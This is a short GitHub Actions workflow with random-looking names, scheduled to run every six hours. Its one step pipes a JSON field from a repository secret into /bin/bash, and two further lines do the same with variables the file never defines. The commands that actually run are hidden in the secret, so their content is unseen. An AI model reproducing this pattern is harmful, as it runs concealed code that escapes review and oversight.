name: guojinjun5317

on:
  workflow_dispatch:
  schedule:
    - cron: '53 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guojinjun5317
        env:
          txs0: ${{ secrets.txs0 }}
        run: |
          echo $txs0 | jq -r .vgxtw3 | /bin/bash
          echo $xnjv275 | jq -r .o654 | /bin/bash
          echo $dy63167 | jq -r .wrj227 | /bin/bash

